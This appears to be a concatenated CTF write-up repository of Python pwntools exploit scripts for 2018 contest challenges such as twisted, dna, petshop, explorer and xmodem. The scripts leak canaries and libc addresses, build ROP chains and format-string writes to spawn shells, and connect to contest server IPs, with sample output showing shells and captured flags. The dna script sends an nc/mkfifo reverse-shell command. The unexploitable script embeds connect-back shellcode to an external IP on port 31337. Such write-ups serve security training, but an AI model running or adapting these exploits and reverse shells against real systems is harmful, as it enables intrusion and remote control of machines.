"Fail" 21 | return 22 | answer = eval(question1) 23 | r1.sendline(str(answer)) 24 | r2.sendline(str(answer)) 25 | 26 | fgets_buff = 0x08048979 27 | puts_plt = 0x080484E0 28 | printf_got = 0x804a00c 29 | bss = 0x804b000-0x100 30 | r1.recvuntil("Bot Verification Complete!\n") 31 | r2.recvuntil("Bot Verification Complete!\n") 32 | r2.recvuntil("Enter your message below :\n") 33 | canary = u32(r1.recv(4)) # patched local binary -> puts(canary) 34 | """ 35 | .text:08048961 push offset dword_804AA28 ; Keypatch modified this from: 36 | .text:08048961 ; push offset aEnterYourMessa 37 | .text:08048966 call _puts 38 | """ 39 | log.info('canary: %#x' % canary) 40 | r2.send("1") 41 | payload = "A"*0x10 42 | payload += p32(canary) 43 | payload += p32(bss) # ebp 44 | payload += p32(puts_plt) 45 | payload += p32(fgets_buff) 46 | payload += p32(printf_got) 47 | raw_input("?") 48 | r2.sendline(payload) 49 | printf = u32(r2.recv(4)) 50 | baselibc = printf - offset_printf 51 | system = baselibc + offset_system 52 | sh = baselibc + offset_sh 53 | log.info('libc: %#x' % baselibc) 54 | log.info('system: %#x' % system) 55 | log.info('sh: %#x' % sh) 56 | log.info('printf: %#x' % printf) 57 | 58 | payload = "A"*0x10 59 | payload += p32(canary) 60 | payload += p32(bss) # ebp 61 | payload += p32(system) 62 | payload += p32(fgets_buff) 63 | payload += p32(sh) 64 | raw_input("?") 65 | r2.sendline(payload) 66 | r2.interactive() 67 | 68 | twisted(sys.argv[1]) -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted_local.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def twisted(DEBUG): 6 | t = 0.3 7 | offset_system = 0x3a940 8 | offset_sh = 0x15902b 9 | offset_printf = 0x49020 10 | if DEBUG=="1": 11 | t = 0.005 12 | r = process("./twisted_patched") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | r = process("./twisted_patched", env={"LD_PRELOAD":"./libc.so.6"}) 16 | raw_input("debug?") 17 | elif DEBUG=="3": 18 | HOST = '34.218.199.37' 19 | PORT = 6000 20 | r = remote(HOST,PORT) 21 | 22 | for i in xrange(312): 23 | question = r.recvuntil("\n").split("=")[0] 24 | answer = eval(question) 25 | print question, answer 26 | r.sendline(str(answer)) 27 | 28 | fgets_buff = 0x08048979 29 | puts_plt = 0x080484E0 30 | printf_got = 0x804a00c 31 | bss = 0x804b000-0x100 32 | r.recvuntil("Bot Verification Complete!\n") 33 | canary = u32(r.recv(4)) 34 | log.info('canary: %#x' % canary) 35 | r.recv(1) 36 | r.send("1") 37 | payload = "A"*0x10 38 | payload += p32(canary) 39 | payload += p32(bss) # ebp 40 | payload += p32(puts_plt) 41 | payload += p32(fgets_buff) 42 | payload += p32(printf_got) 43 | raw_input("?") 44 | r.sendline(payload) 45 | printf = u32(r.recv(4)) # patched local binary -> puts(canary) 46 | """ 47 | .text:08048961 push offset dword_804AA28 ; Keypatch modified this from: 48 | .text:08048961 ; push offset aEnterYourMessa 49 | .text:08048966 call _puts 50 | """ 51 | baselibc = printf - offset_printf 52 | system = baselibc + offset_system 53 | sh = baselibc + offset_sh 54 | log.info('libc: %#x' % baselibc) 55 | log.info('system: %#x' % system) 56 | log.info('sh: %#x' % sh) 57 | log.info('printf: %#x' % printf) 58 | 59 | payload = "A"*0x10 60 | payload += p32(canary) 61 | payload += p32(bss) # ebp 62 | payload += p32(system) 63 | payload += p32(fgets_buff) 64 | payload += p32(sh) 65 | raw_input("?") 66 | r.sendline(payload) 67 | r.interactive() 68 | 69 | twisted(sys.argv[1]) -------------------------------------------------------------------------------- /2018/bytebandit/twisted/twisted_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/bytebandit/twisted/twisted_patched -------------------------------------------------------------------------------- /2018/insecurity-insa/Gcorp Stage 2/dna: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/insecurity-insa/Gcorp Stage 2/dna -------------------------------------------------------------------------------- /2018/insecurity-insa/Gcorp Stage 2/dna.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | import random 5 | 6 | def dna(DEBUG): 7 | t = 0.3 8 | table = ["AAAA", "AAAC", "AAAG", "AAAT", "AACA", "AACC", "AACG", "AACT", "AAGA", "AAGC", "AAGG", "AAGT", "AATA", "AATC", "AATG", "AATT", "ACAA", "ACAC", "ACAG", "ACAT", "ACCA", "ACCC", "ACCG", "ACCT", "ACGA", "ACGC", "ACGG", "ACGT", "ACTA", "ACTC", "ACTG", "ACTT", "AGAA", "AGAC", "AGAG", "AGAT", "AGCA", "AGCC", "AGCG", "AGCT", "AGGA", "AGGC", "AGGG", "AGGT", "AGTA", "AGTC", "AGTG", "AGTT", "ATAA", "ATAC", "ATAG", "ATAT", "ATCA", "ATCC", "ATCG", "ATCT", "ATGA", "ATGC", "ATGG", "ATGT", "ATTA", "ATTC", "ATTG", "ATTT", "CAAA", "CAAC", "CAAG", "CAAT", "CACA", "CACC", "CACG", "CACT", "CAGA", "CAGC", "CAGG", "CAGT", "CATA", "CATC", "CATG", "CATT", "CCAA", "CCAC", "CCAG", "CCAT", "CCCA", "CCCC", "CCCG", "CCCT", "CCGA", "CCGC", "CCGG", "CCGT", "CCTA", "CCTC", "CCTG", "CCTT", "CGAA", "CGAC", "CGAG", "CGAT", "CGCA", "CGCC", "CGCG", "CGCT", "CGGA", "CGGC", "CGGG", "CGGT", "CGTA", "CGTC", "CGTG", "CGTT", "CTAA", "CTAC", "CTAG", "CTAT", "CTCA", "CTCC", "CTCG", "CTCT", "CTGA", "CTGC", "CTGG", "CTGT", "CTTA", "CTTC", "CTTG", "CTTT", "GAAA", "GAAC", "GAAG", "GAAT", "GACA", "GACC", "GACG", "GACT", "GAGA", "GAGC", "GAGG", "GAGT", "GATA", "GATC", "GATG", "GATT", "GCAA", "GCAC", "GCAG", "GCAT", "GCCA", "GCCC", "GCCG", "GCCT", "GCGA", "GCGC", "GCGG", "GCGT", "GCTA", "GCTC", "GCTG", "GCTT", "GGAA", "GGAC", "GGAG", "GGAT", "GGCA", "GGCC", "GGCG", "GGCT", "GGGA", "GGGC", "GGGG", "GGGT", "GGTA", "GGTC", "GGTG", "GGTT", "GTAA", "GTAC", "GTAG", "GTAT", "GTCA", "GTCC", "GTCG", "GTCT", "GTGA", "GTGC", "GTGG", "GTGT", "GTTA", "GTTC", "GTTG", "GTTT", "TAAA", "TAAC", "TAAG", "TAAT", "TACA", "TACC", "TACG", "TACT", "TAGA", "TAGC", "TAGG", "TAGT", "TATA", "TATC", "TATG", "TATT", "TCAA", "TCAC", "TCAG", "TCAT", "TCCA", "TCCC", "TCCG", "TCCT", "TCGA", "TCGC", "TCGG", "TCGT", "TCTA", "TCTC", "TCTG", "TCTT", "TGAA", "TGAC", "TGAG", "TGAT", "TGCA", "TGCC", "TGCG", "TGCT", "TGGA", "TGGC", "TGGG", "TGGT", "TGTA", "TGTC", "TGTG", "TGTT", "TTAA", "TTAC", "TTAG", "TTAT", "TTCA", "TTCC", "TTCG", "TTCT", "TTGA", "TTGC", "TTGG", "TTGT", "TTTA", "TTTC", "TTTG", "TTTT"] 9 | def genPayload(payload): 10 | res = "" 11 | for c in payload: 12 | res+=table[ord(c)] 13 | return res 14 | 15 | if DEBUG=="1": 16 | t = 0.005 17 | r = process("./dna") 18 | raw_input("debug?") 19 | command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0 8 >/tmp/f" # 0 = 127.0.0.1 20 | data = "A"*0x80 21 | data += command 22 | data += "\x00" 23 | payload = genPayload(data) 24 | r.sendline(payload) 25 | r.interactive() 26 | 27 | 28 | dna(sys.argv[1]) 29 | """ 30 | $ python dna.py 1 31 | [+] Starting local process './dna': pid 2854 32 | debug? 33 | [*] Switching to interactive mode 34 | $ 35 | """ 36 | """ 37 | $ sudo nc -lvvp 8 38 | Listening on [0.0.0.0] (family 0, port 8) 39 | Connection from [127.0.0.1] port 8 [tcp/*] accepted (family 2, sport 41104) 40 | $ cat flag.txt 41 | NSA{1fb977db25976d7e1a0fb713383de1cea90b2d15b4173708d867be3793571ed9} 42 | $ 43 | """ -------------------------------------------------------------------------------- /2018/matesctf_pwn/bmhh/bmhh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/bmhh/bmhh -------------------------------------------------------------------------------- /2018/matesctf_pwn/bmhh/bmhh.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def bmhh(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./bmhh") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '125.235.240.168' 14 | PORT = 17357 15 | r = remote(HOST,PORT) 16 | 17 | def Add(ManOrWoman, name, age, desc): 18 | r.sendline("1") 19 | r.recvuntil("> ") 20 | r.sendline(str(ManOrWoman)) 21 | r.recvuntil("Name: ") 22 | r.sendline(name) 23 | r.recvuntil("Age: ") 24 | r.sendline(str(age)) 25 | r.recvuntil("Description: ") 26 | r.sendline(desc) 27 | return r.recvuntil("> ") 28 | 29 | def Replace(ManOrWoman, name, age, desc, idx): 30 | r.sendline("1") 31 | r.recvuntil("> ") 32 | r.sendline(str(ManOrWoman)) 33 | r.recvuntil("Name: ") 34 | r.sendline(name) 35 | r.recvuntil("Age: ") 36 | r.sendline(str(age)) 37 | r.recvuntil("Description: ") 38 | r.sendline(desc) 39 | r.recvuntil("> ") 40 | r.sendline(str(idx)) 41 | return r.recvuntil("> ") 42 | 43 | def View(idx): 44 | r.sendline("2") 45 | res = r.recvuntil("> ") 46 | r.sendline(str(idx)) 47 | res2 = r.recvuntil("> ") 48 | return res+res2 49 | 50 | def Edit(idx, typeInfo, info): 51 | r.sendline("3") 52 | res = r.recvuntil("> ") 53 | r.sendline(str(idx)) 54 | r.recvuntil("> ") # Chon thong tin muon sua: 55 | r.sendline(str(typeInfo)) # 1. Name | 2. Age | 3. Description 56 | if typeInfo==1: 57 | r.recvuntil("Name: ") 58 | r.sendline(str(info)) 59 | elif typeInfo==2: 60 | r.recvuntil("Age: ") 61 | r.sendline(str(info)) 62 | elif typeInfo==3: 63 | r.recvuntil("Description: ") 64 | r.sendline(str(info)) 65 | r.recvuntil("> ") 66 | return res 67 | 68 | def GhepDoi(): 69 | r.sendline("4") 70 | return r.recvuntil("> ") 71 | 72 | def HappyEnding(idx): 73 | r.sendline("5") 74 | r.recvuntil("> ") 75 | r.sendline(str(idx)) 76 | r.recvuntil("> ") 77 | r.sendline("1") 78 | return r.recvuntil("> ") 79 | 80 | atoi_got = 0x603078 81 | 82 | FLAG = 0x603440-0x238 83 | r.recvuntil("> ") 84 | name = "A"*0x30 85 | age = 0x1234 86 | desc1 = "1"*0xfe 87 | Add(1, name, age, desc1) 88 | 89 | name = "C"*0x30 90 | age = 0x5678 91 | desc = "2"*0xbe 92 | desc += p64(FLAG) 93 | desc += "4"*0x138 94 | Add(2, name, age, desc) 95 | N = ord("C") 96 | Add(2, chr(N)*0x30, age, desc) 97 | N+=1 98 | Add(2, chr(N)*0x30, age, desc) 99 | N+=1 100 | Add(2, chr(N)*0x30, age, desc) 101 | N+=1 102 | Add(2, chr(N)*0x30, age, desc) 103 | N+=1 104 | Add(2, chr(N)*0x30, age, desc) 105 | N+=1 106 | Add(2, chr(N)*0x30, age, desc) 107 | N+=1 108 | Add(2, chr(N)*0x30, age, desc) 109 | N+=1 110 | Add(2, chr(N)*0x30, age, desc) 111 | N+=1 112 | Add(2, chr(N)*0x30, age, desc) 113 | N+=1 114 | 115 | while 1: 116 | res = GhepDoi() 117 | if "Chuc hai ban hen ho vui ve:" in res: 118 | break 119 | time.sleep(0.01) 120 | 121 | HappyEnding(1) 122 | desc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9"+p64(FLAG)+"2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9" 123 | Replace(2, "Z"*0x30, 0x5432, desc , 1) 124 | 125 | Replace(1, "X"*0x30, 0x4321, "4"*0xfe, 2) 126 | r.sendline("5") 127 | r.sendline("2") 128 | r.sendline("1") 129 | r.interactive() 130 | 131 | bmhh(sys.argv[1]) 132 | 133 | """ 134 | define ff 135 | echo ============== LIST_PLAYER:\n 136 | telescope 0x603460 10 137 | echo ============== LIST_TYPE:\n 138 | telescope 0x6034c0 10 139 | echo ============================\n 140 | end 141 | 142 | define fa 143 | telescope 0x603460 20 144 | end 145 | """ 146 | # mastesctf{W3lld0ne_Expl0it_4s_e4sy_4s_pi3} -------------------------------------------------------------------------------- /2018/matesctf_pwn/echo/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/echo/echo -------------------------------------------------------------------------------- /2018/matesctf_pwn/echo/echo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.clear(arch = 'amd64') 5 | def echo(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./echo") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = '125.235.240.168' 11 | PORT = 27015 12 | r = remote(HOST,PORT) 13 | 14 | 15 | puts_got = 0x601018 16 | flag = 0x4007B6 17 | offset = 8+3 18 | payload = "%1974u"+"%"+str(offset)+"$hn" 19 | payload += "%1000000000x" # >10s => alarm 20 | payload += p64(puts_got) 21 | r.sendline(payload) # puts_got -> flag 22 | 23 | r.interactive() 24 | 25 | echo(sys.argv[1]) 26 | 27 | # matesctf{How_Can_You_Escape_My_Special_Exit_Function?} -------------------------------------------------------------------------------- /2018/matesctf_pwn/explorer/explorer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/explorer/explorer -------------------------------------------------------------------------------- /2018/matesctf_pwn/explorer/explorer.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.clear(arch = 'amd64') 5 | 6 | def explorer(DEBUG): 7 | if DEBUG=="1": 8 | r = process("./explorer") 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | HOST = '125.235.240.168' 12 | PORT = 27016 13 | r = remote(HOST,PORT) 14 | 15 | read_plt = 0x400610 16 | atoi_got = 0x161F020 17 | puts_plt = 0x400640 18 | main = 0xd40a28 19 | pop_rdi_ret = 0x462b47 20 | offset_atoi = 0x36E80 21 | offset_system = 0x45390 22 | offset_sh = 0x18CD57 23 | castle_num = 42590 24 | r.recvuntil("Castle number: ") 25 | r.send(str(castle_num).ljust(8,"\x00")) 26 | r.send("nSGDGJV\x00") 27 | payload = "" 28 | payload += "A"*0x10 29 | payload += "B"*8 30 | payload += p64(pop_rdi_ret) 31 | payload += p64(atoi_got) 32 | payload += p64(puts_plt) # put(atoi_got) 33 | payload += p64(main) 34 | r.sendline(payload) 35 | 36 | r.recvuntil("GET IT?\n") 37 | res = r.recv(6) 38 | atoi = u64(res.ljust(8,"\x00")) 39 | baselibc = atoi - offset_atoi 40 | system = baselibc + offset_system 41 | sh = baselibc + offset_sh 42 | log.info('baselibc: %#x' % baselibc) 43 | log.info('system: %#x' % system) 44 | log.info('sh: %#x' % sh) 45 | log.info('atoi: %#x' % atoi) 46 | 47 | r.recvuntil("Castle number: ") 48 | r.send(str(castle_num).ljust(8,"\x00")) 49 | r.send("nSGDGJV\x00") 50 | payload = "" 51 | payload += "A"*0x10 52 | payload += "B"*8 53 | payload += p64(pop_rdi_ret) 54 | payload += p64(sh) 55 | payload += p64(system) 56 | r.sendline(payload) 57 | 58 | r.interactive() 59 | 60 | explorer(sys.argv[1]) 61 | # matesctf{Ahihi_Ohoho_H2+O2=HOHO_You_Found_My_Flag} -------------------------------------------------------------------------------- /2018/matesctf_pwn/harrypotter/harrypotter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/harrypotter/harrypotter -------------------------------------------------------------------------------- /2018/matesctf_pwn/harrypotter/harrypotter.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | def harrypotter(): 3 | HOST = '125.235.240.168' 4 | PORT = 27017 5 | def connect(): 6 | # return process("./harrypotter") 7 | return remote(HOST,PORT) 8 | 9 | context.log_level = "critical" 10 | payload = "%12$s" 11 | payload = payload.ljust(0x30,"B") 12 | payload += "\xf0" # bruteforce 1.5 bytes stack 13 | payload += "\x95" 14 | count = 0 15 | while 1: 16 | print count 17 | count += 1 18 | r = connect() 19 | r.recvuntil("It's time to cast your spell\n") 20 | r.send(payload) 21 | try: 22 | res = r.recv() 23 | except: 24 | r.close() 25 | continue 26 | if "matesctf{" in res and "matesctf{}" not in res: 27 | print res 28 | break 29 | r.close() 30 | 31 | harrypotter() 32 | # matesctf{wingalium_leviosaaaaaaaaaaaaaaaaaaaaaaa_hahaha} -------------------------------------------------------------------------------- /2018/matesctf_pwn/petshop/petshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/petshop/petshop -------------------------------------------------------------------------------- /2018/matesctf_pwn/petshop/petshop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def petshop(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./petshop") 11 | raw_input("debug?") 12 | elif DEBUG=="2": 13 | HOST = '125.235.240.168' 14 | PORT = 26000 15 | r = remote(HOST,PORT) 16 | 17 | def Buy(petType, color=1, name="BBBB"): 18 | r.sendline("1") 19 | r.recvuntil("3. Fish") 20 | r.sendline(str(petType)) # 1. Dog | 2. Cat | 3. Fish 21 | if petType==2: 22 | r.recvuntil("2. White") 23 | r.sendline(str(color)) 24 | r.recvuntil("Enter pet name:") 25 | r.sendline(name) 26 | return r.recvuntil("Your choice: ") 27 | 28 | def Feed(idx, cups): 29 | r.sendline("2") 30 | r.recvuntil("Enter pet number:") 31 | r.sendline(str(idx)) 32 | r.recvuntil("How many cups of food? ") 33 | r.sendline(str(cups)) 34 | return r.recvuntil("Your choice: ") 35 | 36 | def Poop(idx): 37 | r.sendline("3") 38 | r.recvuntil("Enter pet number:") 39 | r.sendline(str(idx)) 40 | return r.recvuntil("Your choice: ") 41 | 42 | def Show(): 43 | r.sendline("4") 44 | return r.recvuntil("Your choice: ") 45 | 46 | def Play(idx): 47 | r.sendline("5") 48 | r.recvuntil("Enter pet number:") 49 | r.sendline(str(idx)) 50 | 51 | def PlayDog(idx, color): 52 | Play(idx) 53 | r.recvuntil("Change color?(Y/N) ") 54 | r.sendline("Y") 55 | r.sendline(color) 56 | return r.recvuntil("Your choice: ") 57 | 58 | def PlayFish(idx, isTrain, area): 59 | Play(idx) 60 | r.recvuntil("Train your fish?(Y/N) ") 61 | if isTrain: 62 | r.sendline("Y") 63 | else: 64 | r.sendline("N") 65 | r.recvuntil("Enter area:") 66 | r.sendline(area) 67 | 68 | 69 | 70 | dec = 0xff00 71 | inc = 0x100 72 | 73 | r.recvuntil("Your choice: ") 74 | color = 2 75 | name = "A"*0xff 76 | Buy(2, 1, name) 77 | Feed(1, inc) # 2 -> 3 Fish 78 | PlayFish(1, True, "") 79 | Feed(1, dec*2) # 3 -> 1 Dog 80 | PlayDog(1, "X"*6) 81 | res = Show() 82 | func = u64(res.split("XXXXXX")[1].splitlines()[0].ljust(8,"\x00")) 83 | base = func - 0x159d 84 | system = base + 0x1583 85 | log.info('base: %#x' % base) 86 | log.info('system: %#x' % system) 87 | log.info('func: %#x' % func) 88 | 89 | payload = "B"*6 90 | payload += p64(system) 91 | PlayDog(1, payload) 92 | Feed(1, inc*2) # 1 -> 3 Fish 93 | PlayFish(1, False, "/bin/sh") 94 | 95 | r.interactive() 96 | 97 | petshop(sys.argv[1]) 98 | 99 | """ 100 | define ff 101 | echo ============== LIST_ANIMAL:\n 102 | telescope 0x555555757080 10 103 | echo ============== COUNT:\n 104 | telescope 0x5555557570D0 1 105 | echo ============================\n 106 | end 107 | 108 | define fa 109 | x/40gx {long}0x555555757080-0x10 110 | end 111 | define fa 112 | telescope {long}0x555555757080-0x10 113 | end 114 | 115 | struct __attribute__((aligned(8))) animal 116 | { 117 | _QWORD FUNC; 118 | _WORD cups; 119 | char name[8]; 120 | char color[6]; 121 | _QWORD Active; 122 | }; 123 | """ 124 | """ 125 | $ python petshop.py 2 126 | [+] Opening connection to 125.235.240.168 on port 26000: Done 127 | [*] base: 0x559c9fc69000 128 | [*] system: 0x559c9fc6a583 129 | [*] func: 0x559c9fc6a59d 130 | [*] Switching to interactive mode 131 | $ id 132 | uid=1006(petshop) gid=1006(petshop) groups=1006(petshop) 133 | $ ls 134 | flag 135 | petshop 136 | run.sh 137 | $ cat flag 138 | mastesctf{lovely_pets} 139 | $ 140 | """ -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/unexploitable/payload -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/vuln_app: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_pwn/unexploitable/vuln_app -------------------------------------------------------------------------------- /2018/matesctf_pwn/unexploitable/vuln_app.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | context.arch = "amd64" 5 | 6 | def vuln_app(DEBUG): 7 | 8 | if DEBUG=="1": 9 | r = process("./vuln_app") 10 | raw_input("debug?") 11 | 12 | def a(s): 13 | return asm(s, arch = "amd64", os = "linux") 14 | 15 | IPADDR = "\xa7\x58\x72\xd9" # 167.88.114.217 16 | PORT = "\x7a\x69" # 31337 17 | shellcode_connect = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"+PORT+"\xc7\x44\x24\x04"+IPADDR+"\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" 18 | shellcode = "\x90"*0x50 19 | shellcode += shellcode_connect 20 | shellcode = shellcode.ljust(0x200,"\x90") 21 | 22 | main = 0x400286 23 | data = 0x601000 24 | syscall = 0x400341 25 | r.recvuntil("Now, the environment is also strict. Can you exploit me anyway?") 26 | payload = "A"*0xc 27 | payload += p64(syscall) 28 | payload += p64(data) 29 | payload += p64(0) # rax sysread 30 | payload += p64(0) # rdi stdin 31 | payload += p64(data) # rsi buf 32 | payload += p64(0x200) # rdx nbytes 33 | payload.ljust(0x64,"\x00") 34 | r.send(payload) 35 | r.send(shellcode) 36 | open("payload","wb").write(payload+shellcode) 37 | 38 | r.interactive() 39 | 40 | vuln_app(sys.argv[1]) -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_session3/round2/libc-2.23.so -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/xmodem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/matesctf_session3/round2/xmodem -------------------------------------------------------------------------------- /2018/matesctf_session3/round2/xmodem.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def chall(DEBUG): 6 | if DEBUG=="1": 7 | r = process("./chall") 8 | raw_input("debug?") 9 | elif DEBUG=="2": 10 | HOST = '42.117.243.201' 11 | PORT = 9999 12 | r = remote(HOST,PORT) 13 | 14 | def pause(): 15 | # raw_input("?") 16 | time.sleep(0.1) 17 | 18 | def Login(username, password): 19 | r.sendline("1") 20 | r.recvuntil("User name: ") 21 | r.send(username) 22 | pause() 23 | r.recvuntil("Password: ") 24 | r.send(password) 25 | 26 | def AddWhiteListMac(mac): 27 | r.sendline("3") 28 | r.recvuntil("MAC address: ") 29 | r.sendline(mac) 30 | return r.recvuntil("Your choice: ") 31 | 32 | def SetSSID(ssid): 33 | r.sendline("5") 34 | r.recvuntil("New SSID: ") 35 | r.send(ssid) 36 | return r.recvuntil("Your choice: ") 37 | 38 | def SetWirelessPassword(password): 39 | r.sendline("6") 40 | r.recvuntil("New Wireless Password: ") 41 | r.send(password) 42 | return r.recvuntil("Your choice: ") 43 | 44 | offset_system = 0x2c780 45 | offset_printf = 0x36fb4 46 | offset_sh = 0xca3e3 47 | BSS = 0x22500 48 | gadget = 0x000108ac # pop {r0, r1, r4, r8, fp, ip, sp, pc} 49 | MACLIST = 0x2204c 50 | SSID = 0x22008 51 | readStr = 0x108c4 52 | read_plt = 0x1070c 53 | printf_got = 0x21fa8 54 | puts_plt = 0x10754 55 | r.recvuntil("Your choice: ") 56 | Login("root\x00", "\x00") 57 | r.recvuntil("Your choice: ") 58 | payload = "F"*17 59 | AddWhiteListMac(payload) 60 | AddWhiteListMac(payload) 61 | AddWhiteListMac(payload) 62 | AddWhiteListMac("12"+p32(0xffffffff-1)) 63 | AddWhiteListMac("F"*12+"\x00"*5+"XX"+"F"*5) # overwrite canary 64 | payload = p32(BSS) # r7 65 | payload += p32(gadget) # pc 66 | payload += p32(MACLIST) # r0 67 | payload += p32(0x100) # r1 68 | payload += "1111" 69 | SetSSID(payload) 70 | payload = "1111" # r8 71 | payload += "1111" # fp 72 | payload += "1111" # ip 73 | payload += p32(SSID+0x50) # sp 74 | payload += p32(readStr+1) # pc 75 | SetWirelessPassword(payload) 76 | password = "B"*0x28+"F"*4 77 | password += "C"*4 78 | password += "1111" # r4 79 | password += p32(SSID) # r7 80 | password += "\x61\x0e" 81 | Login("\n", password) 82 | r.recvuntil("Wrong username or password!") 83 | pause() 84 | payload = "A"*4 85 | payload += p32(SSID+0x70) # r7 86 | payload += p32(gadget) # pc 87 | payload += p32(printf_got) # r0 88 | payload += p32(printf_got) # r1 89 | payload += p32(printf_got) # r4 90 | payload += p32(printf_got) # r8 91 | payload += p32(printf_got) # fp 92 | payload += p32(printf_got) # ip 93 | payload += p32(BSS) # sp 94 | payload += p32(puts_plt) # pc 95 | payload += "X"*4 96 | payload += p32(SSID) 97 | payload += "Z"*4 98 | payload += "A"*4 99 | payload += p32(SSID+0x70) # r7 100 | payload += p32(gadget) # pc 101 | payload += p32(0x224f8) # r0 102 | payload += p32(0x100) # r1 103 | payload += p32(printf_got) # r4 104 | payload += p32(printf_got) # r8 105 | payload += p32(printf_got) # fp 106 | payload += p32(printf_got) # ip 107 | payload += p32(BSS) # sp 108 | payload += p32(readStr+1) # pc 109 | payload = payload.ljust(0x9f,"X") 110 | r.sendline(payload) 111 | 112 | printf = u32(r.recv(4)) 113 | libc = printf - offset_printf 114 | system = libc + offset_system 115 | sh = libc + offset_sh 116 | log.info("libc: %#x" % libc) 117 | log.info("printf: %#x" % printf) 118 | log.info("system: %#x" % system) 119 | log.info("sh: %#x" % sh) 120 | payload = p32(SSID+0x70) # r7 121 | payload += p32(gadget) # pc 122 | payload += p32(sh) # r0 123 | payload += p32(0x100) # r1 124 | payload += p32(printf_got) # r4 125 | payload += p32(printf_got) # r8 126 | payload += p32(printf_got) # fp 127 | payload += p32(printf_got) # ip 128 | payload += p32(BSS) # sp 129 | payload += p32(system) # pc 130 | r.sendline(payload) 131 | r.interactive() 132 | 133 | chall(sys.argv[1]) 134 | 135 | """ 136 | $ python xmodem.py 2 137 | [+] Opening connection to 42.117.243.201 on port 9999: Done 138 | [*] 